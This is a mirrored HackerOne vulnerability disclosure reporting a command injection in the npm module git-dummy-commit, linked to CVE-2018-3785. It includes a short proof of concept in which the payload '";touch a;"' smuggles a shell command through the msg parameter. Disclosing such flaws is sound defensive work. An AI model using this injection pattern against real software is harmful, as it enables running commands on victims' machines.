Lucene search
CaioludersH1:341710HistoryApr 22, 2018 - 3:26 a.m.
Node.js third-party modules: [git-dummy-commit] Command injection on the msg parameter
2018-04-2203:26:03
caioluders
hackerone.com
16
0.005 Low
EPSS
Percentile
75.9%
Hi there, I’ve found a Command Injection on the “git-dummy-commit” module.
Module
module name: git-dummy-commitversion:1.3.0npm page: https://www.npmjs.com/package/git-dummy-commit
Module Description
> Create a dummy commit for testing
Module Stats
[62] downloads in the last day
[94] downloads in the last week
[384] downloads in the last month
[6078] downloads in the last year
Vulnerability
Vulnerability Description
The module appends the msg parameter to a command on the line 37 without escaping it, leading to a command injection.
Steps To Reproduce:
- Install the module
$ npm install git-dummy-commit
- Example code with the malicious payload
";touch a;"on line 3.
const gitDummyCommit = require('git-dummy-commit');
gitDummyCommit('";touch a;"');
- Run it.
$ node index.js
- Check the newly create file
a
$ ls
a index.js
Patch
It is advisable to use a module that explicitly isolates the parameters to the git command.
( contacted the maintainer || opened issue ) = False
Impact
An attacker that controls the msg parameter can injection command on the victim’s machine.
Related
osv
osv
CVE-2018-3785
2018-08-17 13:29:00
Command Injection in git-dummy-commit
2018-08-21 17:03:33
prion
prion
Command injection
2018-08-17 13:29:00
nvd
nvd
CVE-2018-3785
2018-08-17 13:29:00
veracode
veracode
Command Injection
2018-06-18 11:33:32
cvelist
cvelist
CVE-2018-3785
2018-08-17 13:00:00
cve
cve
CVE-2018-3785
2018-08-17 13:29:00
github
github
Command Injection in git-dummy-commit
2018-08-21 17:03:33